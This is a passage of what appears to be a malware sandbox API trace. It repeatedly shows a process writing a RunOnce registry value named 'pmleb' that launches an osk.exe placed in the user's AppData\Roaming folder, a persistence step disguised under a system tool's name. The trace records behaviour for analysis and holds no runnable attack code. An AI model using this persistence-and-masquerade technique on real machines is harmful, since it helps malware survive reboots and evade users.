wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.691] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.691] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.692] KillTimer (hWnd=0x20280, uIDEvent=0x22f0) returned 1 [0098.692] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.692] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.692] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.692] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.692] RegCloseKey (hKey=0x280) returned 0x0 [0098.693] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.693] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.693] SetTimer (hWnd=0x20280, nIDEvent=0x22f1, uElapse=0xa, lpTimerFunc=0x0) returned 0x22f1 [0098.693] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.707] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.707] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.707] KillTimer (hWnd=0x20280, uIDEvent=0x22f1) returned 1 [0098.707] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.707] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.707] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.707] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.708] RegCloseKey (hKey=0x280) returned 0x0 [0098.708] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.708] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.708] SetTimer (hWnd=0x20280, nIDEvent=0x22f2, uElapse=0xa, lpTimerFunc=0x0) returned 0x22f2 [0098.708] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.722] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.722] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.722] KillTimer (hWnd=0x20280, uIDEvent=0x22f2) returned 1 [0098.723] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.723] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.723] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.723] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.723] RegCloseKey (hKey=0x280) returned 0x0 [0098.723] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.723] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.723] SetTimer (hWnd=0x20280, nIDEvent=0x22f3, uElapse=0xa, lpTimerFunc=0x0) returned 0x22f3 [0098.723] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.738] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.738] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.739] KillTimer (hWnd=0x20280, uIDEvent=0x22f3) returned 1 [0098.739] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.739] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.739] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.740] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.740] RegCloseKey (hKey=0x280) returned 0x0 [0098.740] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.740] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.740] SetTimer (hWnd=0x20280, nIDEvent=0x22f4, uElapse=0xa, lpTimerFunc=0x0) returned 0x22f4 [0098.740] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.756] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.756] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.757] KillTimer (hWnd=0x20280, uIDEvent=0x22f4) returned 1 [0098.757] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.757] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.757] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.757] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.758] RegCloseKey (hKey=0x280) returned 0x0 [0098.758] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.758] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.758] SetTimer (hWnd=0x20280, nIDEvent=0x22f5, uElapse=0xa, lpTimerFunc=0x0) returned 0x22f5 [0098.758] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.769] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.769] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.769] KillTimer (hWnd=0x20280, uIDEvent=0x22f5) returned 1 [0098.769] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.770] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.770] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.770] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.770] RegCloseKey (hKey=0x280) returned 0x0 [0098.770] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.770] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.770] SetTimer (hWnd=0x20280, nIDEvent=0x22f6, uElapse=0xa, lpTimerFunc=0x0) returned 0x22f6 [0098.770] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.785] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.785] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.785] KillTimer (hWnd=0x20280, uIDEvent=0x22f6) returned 1 [0098.785] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.785] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.785] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.786] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.786] RegCloseKey (hKey=0x280) returned 0x0 [0098.786] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.786] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.786] SetTimer (hWnd=0x20280, nIDEvent=0x22f7, uElapse=0xa, lpTimerFunc=0x0) returned 0x22f7 [0098.786] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.800] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.800] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.800] KillTimer (hWnd=0x20280, uIDEvent=0x22f7) returned 1 [0098.801] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.801] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.801] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.801] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.801] RegCloseKey (hKey=0x280) returned 0x0 [0098.801] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.801] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.801] SetTimer (hWnd=0x20280, nIDEvent=0x22f8, uElapse=0xa, lpTimerFunc=0x0) returned 0x22f8 [0098.801] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.817] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.817] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.817] KillTimer (hWnd=0x20280, uIDEvent=0x22f8) returned 1 [0098.818] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.818] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.818] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.818] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.818] RegCloseKey (hKey=0x280) returned 0x0 [0098.818] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.818] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.819] SetTimer (hWnd=0x20280, nIDEvent=0x22f9, uElapse=0xa, lpTimerFunc=0x0) returned 0x22f9 [0098.819] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.831] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.831] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.832] KillTimer (hWnd=0x20280, uIDEvent=0x22f9) returned 1 [0098.832] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.832] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.832] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.832] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.833] RegCloseKey (hKey=0x280) returned 0x0 [0098.833] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.833] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.833] SetTimer (hWnd=0x20280, nIDEvent=0x22fa, uElapse=0xa, lpTimerFunc=0x0) returned 0x22fa [0098.833] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.847] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.847] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.848] KillTimer (hWnd=0x20280, uIDEvent=0x22fa) returned 1 [0098.848] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.848] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.848] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.849] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.849] RegCloseKey (hKey=0x280) returned 0x0 [0098.849] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.849] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.849] SetTimer (hWnd=0x20280, nIDEvent=0x22fb, uElapse=0xa, lpTimerFunc=0x0) returned 0x22fb [0098.849] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.863] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.863] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.863] KillTimer (hWnd=0x20280, uIDEvent=0x22fb) returned 1 [0098.863] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.863] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.863] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.864] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.864] RegCloseKey (hKey=0x280) returned 0x0 [0098.864] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.864] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.864] SetTimer (hWnd=0x20280, nIDEvent=0x22fc, uElapse=0xa, lpTimerFunc=0x0) returned 0x22fc [0098.864] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.878] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.878] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.878] KillTimer (hWnd=0x20280, uIDEvent=0x22fc) returned 1 [0098.879] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.879] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.879] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.879] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.879] RegCloseKey (hKey=0x280) returned 0x0 [0098.879] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.879] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.880] SetTimer (hWnd=0x20280, nIDEvent=0x22fd, uElapse=0xa, lpTimerFunc=0x0) returned 0x22fd [0098.880] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.894] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.894] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.894] KillTimer (hWnd=0x20280, uIDEvent=0x22fd) returned 1 [0098.894] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.895] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.895] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.895] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.895] RegCloseKey (hKey=0x280) returned 0x0 [0098.895] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.895] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.895] SetTimer (hWnd=0x20280, nIDEvent=0x22fe, uElapse=0xa, lpTimerFunc=0x0) returned 0x22fe [0098.895] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.909] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.909] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.910] KillTimer (hWnd=0x20280, uIDEvent=0x22fe) returned 1 [0098.910] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.910] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.910] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.910] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.911] RegCloseKey (hKey=0x280) returned 0x0 [0098.911] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.911] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.911] SetTimer (hWnd=0x20280, nIDEvent=0x22ff, uElapse=0xa, lpTimerFunc=0x0) returned 0x22ff [0098.911] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.926] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.926] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.926] KillTimer (hWnd=0x20280, uIDEvent=0x22ff) returned 1 [0098.926] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.926] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.927] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.927] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.927] RegCloseKey (hKey=0x280) returned 0x0 [0098.927] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.927] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.927] SetTimer (hWnd=0x20280, nIDEvent=0x2300, uElapse=0xa, lpTimerFunc=0x0) returned 0x2300 [0098.927] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.941] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.941] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.941] KillTimer (hWnd=0x20280, uIDEvent=0x2300) returned 1 [0098.941] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.942] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.942] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.942] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.942] RegCloseKey (hKey=0x280) returned 0x0 [0098.942] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.942] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.942] SetTimer (hWnd=0x20280, nIDEvent=0x2301, uElapse=0xa, lpTimerFunc=0x0) returned 0x2301 [0098.942] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.957] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.957] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.957] KillTimer (hWnd=0x20280, uIDEvent=0x2301) returned 1 [0098.957] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.958] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.958] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.958] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.958] RegCloseKey (hKey=0x280) returned 0x0 [0098.958] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.958] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.958] SetTimer (hWnd=0x20280, nIDEvent=0x2302, uElapse=0xa, lpTimerFunc=0x0) returned 0x2302 [0098.959] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.972] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.972] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.972] KillTimer (hWnd=0x20280, uIDEvent=0x2302) returned 1 [0098.973] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.973] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.973] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: 